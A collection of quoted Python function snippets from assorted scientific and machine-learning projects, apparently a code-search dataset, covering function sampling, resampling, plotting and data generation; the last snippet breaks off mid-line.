"def gendata(params,xmin,xmax,npts=4000):\n F = lorentzian.ForwardFactory\n def gensample(F, xmin, xmax):\n from numpy import arange\n import random\n a = arange(xmin, xmax, (xmax-xmin)/200.)\n ymin = 0\n ymax = F(a).max()\n while 1:\n t1 = random.random() * (xmax-xmin) + xmin\n t2 = random.random() * (ymax-ymin) + ymin\n t3 = F(t1)\n if t2 < t3:\n return t1\n fwd = F(params)\n return array([gensample(fwd, xmin,xmax) for i in xrange(npts)])",
"def random_resample(*args, samples,\n function=None, function_kwargs=None, bundle_args=True,\n replace=True):\n samples_spec = samples.copy() # copy because use pop below\n args_sub = [obj.copy() for obj in args]\n dim_block_1 = [d for d, s in samples_spec.items() if s[1] == 1]\n\n # Do all dimensions with block_size = 1 together\n samples_block_1 = { dim: samples_spec.pop(dim) for dim in dim_block_1 }\n random_samples = {dim: \n np.random.choice(\n len(args_sub[0][dim]),\n size=n,\n replace=replace)\n for dim, (n, _) in samples_block_1.items()}\n args_sub = [obj.isel(\n {dim: random_samples[dim] \n for dim in (set(random_samples.keys()) & set(obj.dims))}) for obj in args_sub]\n\n # Do any remaining dimensions\n for dim, (n, block_size) in samples_spec.items():\n n_blocks = int(n / block_size)\n random_samples = [slice(x,x+block_size) \n for x in np.random.choice(\n len(args_sub[0][dim])-block_size+1, \n size=n_blocks,\n replace=replace)]\n args_sub = [xr.concat([obj.isel({dim: random_sample}) \n for random_sample in random_samples],\n dim=dim) \n if dim in obj.dims else obj \n for obj in args_sub]\n\n if function:\n if bundle_args:\n if function_kwargs is not None:\n res = function(*args_sub, **function_kwargs)\n else:\n res = function(*args_sub)\n else:\n if function_kwargs is not None:\n res = tuple([function(obj, **function_kwargs) for obj in args_sub])\n else:\n res = tuple([function(obj) for obj in args_sub])\n else:\n res = tuple(args_sub,)\n\n if isinstance(res, tuple):\n if len(res) == 1:\n return res[0]\n else:\n return res",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
"def evaluate_1darray_function_on_2d_array(function, samples, opts=None):\n num_args = get_num_args(function)\n assert samples.ndim == 2\n num_samples = samples.shape[1]\n if num_args == 2:\n values_0 = function(samples[:, 0], opts)\n else:\n values_0 = function(samples[:, 0])\n values_0 = np.atleast_1d(values_0)\n assert values_0.ndim == 1\n num_qoi = values_0.shape[0]\n values = np.empty((num_samples, num_qoi), float)\n values[0, :] = values_0\n for i in range(1, num_samples):\n if num_args == 2:\n values[i, :] = function(samples[:, i], opts)\n else:\n values[i, :] = function(samples[:, i])\n\n return values",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def create_samples(f: Callable[..., int], n_args: int, n_bits: int,\n) -> Dict[Tuple[int, ...], Tuple[int, ...]]:\n samples = {}\n max_arg = 2 ** n_bits\n for inputs in itertools.product((0, 1), repeat=n_args * n_bits):\n ints = [int(\"\".join(str(bit) for bit in inputs[i:i + n_bits]), 2)\n for i in range(0, len(inputs), n_bits)]\n try:\n output = f(*ints)\n if 0 <= output < max_arg:\n bit_string = (\"{:0\" + str(n_bits) + \"b}\").format(output)\n samples[inputs] = tuple(int(bit) for bit in bit_string)\n except ZeroDivisionError:\n pass\n return samples",
"def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)",
"def get_data_args(data_func, nfuncs):\n if data_func.__name__ == 'gg_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.75, 'mu': 0.4, 'sigma': 0.3, 'beta': 2.0}]\n elif nfuncs == 2:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.55, 'mu': 0.4, 'sigma': 0.2, 'beta': 4.0}]\n elif nfuncs == 3:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.35, 'mu': 0.6, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.55, 'mu': 0.32, 'sigma': 0.14, 'beta': 6.0}]\n elif nfuncs == 4:\n data_args = [{'a': 0.2, 'mu': 0.3, 'sigma': 0.5, 'beta': 5.0},\n {'a': 0.4, 'mu': 0.65, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.6, 'mu': 0.25, 'sigma': 0.1, 'beta': 6.0},\n {'a': 0.9, 'mu': 0.95, 'sigma': 0.1, 'beta': 6.0}]\n elif data_func.__name__ == 'ta_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.8, 'w_0': 0.0, 'w_1': 1.5}]\n elif nfuncs == 2:\n data_args = [{'a': 0.7, 'w_0': -1, 'w_1': 3},\n {'a': 0.9, 'w_0': 2, 'w_1': -3}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.6, 'w_0': -7, 'w_1': 8},\n {'a': 1, 'w_0': -1, 'w_1': 3},\n {'a': 1.4, 'w_0': 2, 'w_1': -3}]\n elif data_func.__name__ == 'gg_2d':\n # the order is (with first arg sorted):\n # [a_1, mu1_1, mu2_1, s1_1, s2_1, b1_1, b2_1, rot angle]\n if nfuncs == 1:\n data_args = [\n {'a': 0.8, 'mu1': 0.6, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0.1 * np.pi}]\n elif nfuncs == 2:\n data_args = [\n {'a': 0.5, 'mu1': 0.5, 'mu2': 0.4, 'sigma1': 0.4,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.8, 'mu1': 0.5, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.5, 'mu1': 0.3, 'mu2': 0.7, 'sigma1': 0.2,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.7, 'mu1': 0.7, 'mu2': 0.6, 'sigma1': 0.15,\n 'sigma2': 0.15, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.9, 'mu1': 0.4, 'mu2': 0.3, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n try:\n data_args_list = []\n for name in bf.get_bf_param_names(data_func):\n data_args_list += [d[name] for d in data_args]\n return data_args_list\n except NameError:\n raise AssertionError('no data args found! func={} nfuncs={}'.format(\n data_func.__name__, nfuncs))",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def sample_data_input_fn(params):\n window_size = params['window_size']\n batch_size = params['batch_size']\n\n dataset_names = sample_data.get_data_names()\n all_downsampled = [sample_data.get_downsampled_data(name) for name in dataset_names]\n np_dtype = all_downsampled[0].dtype\n _, num_columns = all_downsampled[0].shape\n assert num_columns == 3\n\n # For each data item, this computes\n time_diffs = [(x[1:, 0] - x[:-1, 0]) for x in all_downsampled]\n median_time_diff = np.median(np.concatenate(time_diffs, axis=0))\n lower, upper = median_time_diff * 0.8, median_time_diff * 1.2\n valid_start_window_indices = [\n get_window_valid_indices(d, lower, upper, window_size) for d in time_diffs\n ]\n for name, valid_indices in zip(dataset_names, valid_start_window_indices):\n if np.size(valid_indices) == 0:\n raise ValueError(\"{} has no valid window ranges\".format(name))\n\n def get_samples_py_op(idx_array):\n assert isinstance(idx_array, np.ndarray)\n assert idx_array.shape == (batch_size, )\n samp_results = np.zeros((batch_size, window_size, num_columns), dtype=np_dtype)\n for i, sample_idx in enumerate(idx_array):\n start_idx = random.choice(valid_start_window_indices[sample_idx])\n samp_results[i, :, :] = all_downsampled[sample_idx][start_idx: (\n start_idx + window_size)]\n assert samp_results.shape == (batch_size, window_size, num_columns)\n return samp_results\n\n def get_window_sample(idx_tensor):\n samples = tf.py_func(get_samples_py_op, [idx_tensor], np_dtype)\n samples.set_shape((batch_size, window_size, num_columns))\n return samples\n\n def random_negative_py_op(idx_array):\n assert isinstance(idx_array, np.ndarray)\n neg_idx_array = np.copy(idx_array)\n for i, idx in enumerate(idx_array):\n while neg_idx_array[i] == idx_array[i]:\n neg_idx_array[i] = random.randint(0, len(all_downsampled) - 1)\n return neg_idx_array\n\n def get_negative_window_sample(idx_tensor):\n neg_idx_tensor = tf.py_func(\n random_negative_py_op,\n [idx_tensor],\n idx_tensor.dtype)\n return get_window_sample(neg_idx_tensor)\n\n # Current sample method: First select sample index, then select window.\n num_samples = len(all_downsampled)\n if num_samples < 2:\n raise ValueError(\"Need at least 2 light curves for negative samples!\")\n dataset = tf.data.Dataset.range(num_samples)\n dataset = dataset.repeat().shuffle(num_samples * 2).batch(batch_size)\n\n positive = dataset.map(lambda idx_tensor: {\n 'left': get_window_sample(idx_tensor),\n 'right': get_window_sample(idx_tensor),\n 'goal': tf.constant([1.0] * batch_size, dtype=tf.float64)\n })\n negative = dataset.map(lambda idx_tensor: {\n 'left': get_window_sample(idx_tensor),\n 'right': get_negative_window_sample(idx_tensor),\n 'goal': tf.constant([0.0] * batch_size, dtype=tf.float64)\n })\n\n # TODO(gatoatigrado): Experiment with shuffling positive & negative within a batch.\n # Currently each batch is just positive or negative.\n assert positive.output_shapes == negative.output_shapes\n assert negative.output_types == positive.output_types\n dataset = tf.contrib.data.sample_from_datasets((positive, negative))\n assert dataset.output_shapes == negative.output_shapes\n return dataset",
"def sample_function(\n function: _vtk.vtkImplicitFunction,\n bounds: Sequence[float] = (-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),\n dim: Sequence[int] = (50, 50, 50),\n compute_normals: bool = False,\n output_type: np.dtype = np.double, # type: ignore\n capping: bool = False,\n cap_value: float = sys.float_info.max,\n scalar_arr_name: str = \"scalars\",\n normal_arr_name: str = \"normals\",\n progress_bar: bool = False,\n):\n samp = _vtk.vtkSampleFunction()\n samp.SetImplicitFunction(function)\n samp.SetSampleDimensions(dim)\n samp.SetModelBounds(bounds)\n samp.SetComputeNormals(compute_normals)\n samp.SetCapping(capping)\n samp.SetCapValue(cap_value)\n samp.SetNormalArrayName(normal_arr_name)\n samp.SetScalarArrayName(scalar_arr_name)\n\n if output_type == np.float64:\n samp.SetOutputScalarTypeToDouble()\n elif output_type == np.float32:\n samp.SetOutputScalarTypeToFloat()\n elif output_type == np.int64:\n if os.name == 'nt':\n raise ValueError('This function on Windows only supports int32 or smaller')\n samp.SetOutputScalarTypeToLong()\n elif output_type == np.uint64:\n if os.name == 'nt':\n raise ValueError('This function on Windows only supports int32 or smaller')\n samp.SetOutputScalarTypeToUnsignedLong()\n elif output_type == np.int32:\n samp.SetOutputScalarTypeToInt()\n elif output_type == np.uint32:\n samp.SetOutputScalarTypeToUnsignedInt()\n elif output_type == np.int16:\n samp.SetOutputScalarTypeToShort()\n elif output_type == np.uint16:\n samp.SetOutputScalarTypeToUnsignedShort()\n elif output_type == np.int8:\n samp.SetOutputScalarTypeToChar()\n elif output_type == np.uint8:\n samp.SetOutputScalarTypeToUnsignedChar()\n else:\n raise ValueError(f'Invalid output_type {output_type}')\n\n _update_alg(samp, progress_bar=progress_bar, message='Sampling')\n return wrap(samp.GetOutput())",
"def iid_sample_fn(*args, **kwargs):\n\n with tf.name_scope('iid_sample_fn'):\n\n seed = kwargs.pop('seed', None)\n if samplers.is_stateful_seed(seed):\n kwargs = dict(kwargs, seed=SeedStream(seed, salt='iid_sample')())\n def pfor_loop_body(_):\n with tf.name_scope('iid_sample_fn_stateful_body'):\n return sample_fn(*args, **kwargs)\n else:\n # If a stateless seed arg is passed, split it into `n` different\n # stateless seeds, so that we don't just get a bunch of copies of the\n # same sample.\n if not JAX_MODE:\n warnings.warn(\n 'Saw Tensor seed {}, implying stateless sampling. Autovectorized '\n 'functions that use stateless sampling may be quite slow because '\n 'the current implementation falls back to an explicit loop. This '\n 'will be fixed in the future. For now, you will likely see '\n 'better performance from stateful sampling, which you can invoke '\n 'by passing a Python `int` seed.'.format(seed))\n seed = samplers.split_seed(seed, n=n, salt='iid_sample_stateless')\n def pfor_loop_body(i):\n with tf.name_scope('iid_sample_fn_stateless_body'):\n return sample_fn(*args, seed=tf.gather(seed, i), **kwargs)\n\n if static_n == 1:\n draws = pfor_loop_body(0)\n else:\n draws = parallel_for.pfor(pfor_loop_body, n)\n return tf.nest.map_structure(unflatten, draws, expand_composites=True)",
"def sample_dimension(data, dimension, n_frames, scheme=\"linear\"):\n d_data = [i[:,dimension][:,np.newaxis] for i in data]\n\n #sort it because all three sampling schemes use it\n\n all_vals = []\n for i in d_data:\n all_vals.extend(i.flatten())\n all_vals = np.sort(all_vals)\n\n #get lineraly placed points\n if scheme==\"linear\":\n max_val = all_vals[-1]\n min_val = all_vals[0]\n spaced_points = np.linspace(min_val, max_val, n_frames)\n\n elif scheme==\"random\":\n spaced_points = np.sort(np.random.choice(all_vals, n_frames))\n\n elif scheme==\"edge\":\n _cut_point = np.int(n_frames / 2)\n spaced_points = np.hstack((all_vals[:_cut_point], all_vals[-_cut_point:]))\n else:\n raise ValueError(\"Scheme has be to one of linear, random or edge\")\n\n tree = KDTree(d_data)\n\n return_vec = []\n for pt in spaced_points:\n dis, ind = tree.query([pt])\n return_vec.append(ind)\n\n return return_vec",
"def n_random_resamples(*args, samples, n_repeats, \n function=None, function_kwargs=None, bundle_args=True, \n replace=True, with_dask=True):\n\n if with_dask & (n_repeats > 1000):\n n_args = itertools.repeat(args[0], times=n_repeats)\n b = db.from_sequence(n_args, npartitions=100)\n rs_list = b.map(random_resample, *(args[1:]), \n **{'samples':samples, 'function':function, \n 'function_kwargs':function_kwargs, 'replace':replace}).compute()\n else: \n resample_ = dask.delayed(random_resample) if with_dask else random_resample\n rs_list = [resample_(*args,\n samples=samples,\n function=function,\n function_kwargs=function_kwargs,\n bundle_args=bundle_args,\n replace=replace) for _ in range(n_repeats)] \n if with_dask:\n rs_list = dask.compute(rs_list)[0]\n \n if all(isinstance(r, tuple) for r in rs_list):\n return tuple([xr.concat([r.unify_chunks() for r in rs], dim='k') for rs in zip(*rs_list)])\n else:\n return xr.concat([r.unify_chunks() for r in rs_list], dim='k')",
"def run_f(df, sample_number):\n samples = normal_custom(df.get(Model.MEAN_KEY), df.get(Model.STD_KEY), n_sample=sample_number) # Normal_custom imported from helper_func\n return samples",
"def blumli(function, resolution, domain):\n\t# fugly hacks galore to determine dimensions\n\tinput_dim = len(inspect.getargspec(function).args)\n\toutsample = function( *range(input_dim))\n\toutput_dim = len(list( outsample )) if isinstance(outsample, collections.Iterable) else 1\n\n\tif input_dim == 1:\n\t\tdomain = [(domain[0], domain[1])]\n\n\tunits = [(domain[dim][1]-domain[dim][0])/resolution for dim in range(input_dim) ]\n\n\t# first layer: for each input dimension, we have resolution-1 neurons, each with input_dim inputs\n\tfirst_layer = []\n\tfor dimension in range(input_dim):\n\t\tinput_weights = [1 if dim==dimension else 0 for dim in range(input_dim)]\n\t\tfirst_layer.extend( [Perceptron([domain[dimension][0]+num*units[dimension]] + input_weights, step_function) for num in range(1,resolution)] )\n\n\tsecond_layer = []\n\txs = { }\n\tfor square in product(range(resolution), repeat=input_dim):\n\t\tweights = [0]*len(first_layer)\n\t\tbias = -0.5\n\t\txvalues = [None]*len(square)\n\t\tfor dimension, area in enumerate(square):\n\t\t\thb = area\n\t\t\tlb = area-1\n\n\t\t\tif lb >= 0:\n\t\t\t\tbias += 1\n\t\t\t\tweights[ (resolution-1)*(dimension) + lb ] = 1\n\n\t\t\tif hb < (resolution-1):\n\t\t\t\tbias += 1\n\t\t\t\tweights[ (resolution-1)*(dimension) + hb ] = -1\n\n\t\t\tmidpoint = lb+0.5 if lb>=0 else hb-0.5\n\t\t\txvalues[dimension] = domain[dimension][0] + (1+midpoint)*units[dimension]\n\n\t\tneuron = Perceptron([bias]+weights, zero_step_function)\n\t\tsecond_layer.append( neuron )\n\t\txs[neuron] = xvalues\n\n\tthird_layer = [\n\t\tPerceptron( [0] + [\n\t\t\tfunction(*xs[neuron]) if output_dim==1 else function(*xs[neuron])[outdim] for neuron in second_layer\n\t\t], identity ) for outdim in range(output_dim)\n\t]\n\n\treturn FFNN([first_layer, second_layer, third_layer])",
"def sample_grid(variable='snow_depth', month=None):\n\n my_func = {'snow_depth': snow_depth,\n 'swe': swe}\n\n lat, lon = np.linspace(65.,90.,20), np.linspace(0.,359.,360)\n \n if not month:\n month = np.arange(1,13)\n else:\n month = np.array(month)\n\n x, y = np.meshgrid(lon, lat)\n\n if month.size == 1:\n da = xr.DataArray(my_func[variable](x,y,month),\n coords={'lat': lat, 'lon': lon},\n dims=['lat', 'lon'])\n else:\n da = xr.DataArray([my_func[variable](x, y, m) for m in month],\n coords={'month': month, 'lat': lat, 'lon': lon},\n dims=['month', 'lat', 'lon'])\n return da",
"def rng_fn_scipy(cls, rng, *args, **kwargs):",
"def interpolate(f, Q, method='linear', y_transect=None):\n if isinstance(f, (ufl.core.expr.Expr, firedrake.Function)):\n return firedrake.interpolate(f, Q)\n\n mesh = Q.mesh()\n element = Q.ufl_element()\n if len(element.sub_elements()) > 0:\n element = element.sub_elements()[0]\n\n V = firedrake.VectorFunctionSpace(mesh, element)\n X = firedrake.interpolate(mesh.coordinates, V).dat.data_ro\n\n q = firedrake.Function(Q)\n\n if isinstance(f, rasterio.DatasetReader):\n q.dat.data[:] = _sample(f, X, method, y_transect)\n elif (isinstance(f, tuple)\n and all(isinstance(fi, rasterio.DatasetReader) for fi in f)):\n for i, fi in enumerate(f):\n q.dat.data[:, i] = _sample(fi, X, method, y_transect)\n else:\n raise ValueError('Argument must be a rasterio data set or a tuple of '\n 'data sets!')\n\n return q",
"def linear_function_dataset(a, b, n=100, show_plot=False):\n x = torch.randn(n, 1)\n y = a*x + b + 0.1*torch.randn(n, 1)\n if show_plot:\n show_TensorFunction1D(x, y, marker='.')\n return TensorDataset(x, y)",
"def nonlinear_function_dataset(n=100, show_plot=False):\n x = torch.rand(n, 1)*20 - 10 # Random values between [-10 and 10]\n y = (-1/100)*x**7 -x**4 -2*x**2 -4*x + 1 + 0.1*torch.randn(n, 1)\n if show_plot:\n show_TensorFunction1D(x, y, marker='.')\n return TensorDataset(x, y)",
"def plot(\n self,\n function: Callable[[float], float],\n x_range: Sequence[float] | None = None,\n use_vectorized: bool = False,\n **kwargs,\n ):\n\n t_range = np.array(self.x_range, dtype=float)\n if x_range is not None:\n t_range[: len(x_range)] = x_range\n\n if x_range is None or len(x_range) < 3:\n # if t_range has a defined step size, increase the number of sample points per tick\n t_range[2] /= self.num_sampled_graph_points_per_tick\n # For axes, the third coordinate of x_range indicates\n # tick frequency. But for functions, it indicates a\n # sample frequency\n\n graph = ParametricFunction(\n lambda t: self.coords_to_point(t, function(t)),\n t_range=t_range,\n scaling=self.x_axis.scaling,\n use_vectorized=use_vectorized,\n **kwargs,\n )\n graph.underlying_function = function\n return graph",
"def makePLDS(T, x_0, f, g, Dx, Dy):\n\tX = np.zeros((T, Dx))\n\tY = np.zeros((T, Dy))\n\n\tX[0] = x_0\n\tY[0] = g.sample(x_0)\n\tfor t in range(1,T):\n\t\tX[t] = f.sample(X[t-1])\n\t\tY[t] = g.sample(X[t])\n\treturn X, Y",
"def data_fun(times, n_dipoles=4):\n n = 0 # harmonic number\n n_samp = len(times)\n window = np.zeros(n_samp)\n start, stop = [int(ii * float(n_samp) / (2 * n_dipoles)) for ii in (2 * n, 2 * n + 1)]\n window[start:stop] = 1.0\n n += 1\n data = 25e-9 * np.sin(2.0 * np.pi * 10.0 * n * times)\n data *= window\n return data",
"def sampleFunction(x: int, y: float) -> float:\n return x * y",
"def subsampling(a, samples, iterations, func=identity, func_axis=None, dtype=None):\n # Calculate the number of measurements\n n = __number_measurements(a, func_axis)\n # Evaluate the function on the subsampling means\n subsampling_values = [func(*(__array_mean_indices(a, numpy.random.permutation(range(n))[0:samples], func_axis=func_axis, dtype=dtype))) for i in range(iterations)]\n\n # Return the average value and the error of this averaged value\n return numpy.mean(subsampling_values), math.sqrt(float(samples)/float(iterations*(iterations - 1)))*numpy.std(subsampling_values)",
"def test_sampling(self):\n dim = Fidelity(\"epoch\", 1, 2)\n assert dim.sample() == [2]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample() == [5]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample(4) == [5] * 4",
"def evaluate_sample(\n param: np.ndarray,\n model: Model,\n data: np.ndarray,\n data_transformation: DataTransformation,\n data_stdevs: np.ndarray,\n slice: np.ndarray,\n) -> typing.Tuple[float, np.ndarray]:\n\n log_samplerresult = eval_log_transformed_density(\n param, model, data, data_transformation, data_stdevs, slice\n )\n return log_samplerresult",
"def sample_multirange_empirical_variogram(dh: np.ndarray, gsd: float = None, coords: np.ndarray = None,\n nsamp: int = 10000, range_list: list = None, nrun: int = 1, nproc: int = 1,\n **kwargs) -> pd.DataFrame:\n # checks\n dh = dh.squeeze()\n if coords is None and gsd is None:\n raise TypeError('Must provide either coordinates or ground sampling distance.')\n elif gsd is not None and dh.ndim == 1:\n raise TypeError('Array must be 2-dimensional when providing only ground sampling distance')\n elif coords is not None and dh.ndim != 1:\n raise TypeError('Coordinate array must be provided with 1-dimensional input array')\n elif coords is not None and (coords.shape[0] != 2 and coords.shape[1] != 2):\n raise TypeError('One dimension of the coordinates array must be of length equal to 2')\n\n # defaulting to xx and yy if those are provided\n if coords is not None:\n if coords.shape[0] == 2 and coords.shape[1] != 2:\n coords = np.transpose(coords)\n else:\n x, y = np.meshgrid(np.arange(0, dh.shape[0] * gsd, gsd), np.arange(0, dh.shape[1] * gsd, gsd))\n coords = np.dstack((x.flatten(), y.flatten())).squeeze()\n dh = dh.flatten()\n\n # COMMENTING: custom binning is not supported by skgstat yet...\n # if no range list is specified, define a default one based on the spatial extent of the data and its resolution\n # if 'bin_func' not in kwargs.keys():\n # if range_list is None:\n #\n # # define max range as half the maximum distance between coordinates\n # max_range = np.sqrt((np.max(coords[:,0])-np.min(coords[:,0]))**2+(np.max(coords[:,1])-np.min(coords[:,1]))**2)/2\n #\n # # get the ground sampling distance\n # if gsd is None:\n # est_gsd = np.abs(coords[0,0] - coords[0,1])\n # else:\n # est_gsd = gsd\n #\n # # define ranges as multiple of the resolution until they get close to the maximum range\n # range_list = []\n # new_range = gsd\n # while new_range < max_range/10:\n # range_list.append(new_range)\n # new_range *= 10\n # range_list.append(max_range)\n #\n # else:\n # if range_list is not None:\n # print('Both range_list and bin_func are defined for binning: defaulting to bin_func')\n\n # default value we want to use (kmeans is failing)\n if 'bin_func' not in kwargs.keys():\n kwargs.update({'bin_func': 'even'})\n if 'n_lags' not in kwargs.keys():\n kwargs.update({'n_lags': 100})\n\n # estimate variogram\n if nrun == 1:\n # subsetting\n dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n # getting empirical variogram\n print(dh_sub.shape)\n print(coords_sub.shape)\n df = get_empirical_variogram(dh=dh_sub, coords=coords_sub, **kwargs)\n df['exp_sigma'] = np.nan\n\n else:\n\n # multiple run only work for an even binning function for now (would need a customized binning not supported by skgstat)\n if kwargs.get('bin_func') is None:\n raise ValueError('Binning function must be \"even\" when doing multiple runs.')\n\n # define max range as half the maximum distance between coordinates\n max_range = np.sqrt((np.max(coords[:, 0])-np.min(coords[:, 0]))**2 +\n (np.max(coords[:, 1])-np.min(coords[:, 1]))**2)/2\n # also need a cutoff value to get the exact same bins\n if 'maxlag' not in kwargs.keys():\n kwargs.update({'maxlag': max_range})\n\n # TODO: somewhere here we could think of adding random sampling without replacement\n if nproc == 1:\n print('Using 1 core...')\n list_df_nb = []\n for i in range(nrun):\n dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n df = get_empirical_variogram(dh=dh_sub, coords=coords_sub, **kwargs)\n df['run'] = i\n list_df_nb.append(df)\n else:\n print('Using '+str(nproc) + ' cores...')\n list_dh_sub = []\n list_coords_sub = []\n for i in range(nrun):\n dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n list_dh_sub.append(dh_sub)\n list_coords_sub.append(coords_sub)\n\n pool = mp.Pool(nproc, maxtasksperchild=1)\n argsin = 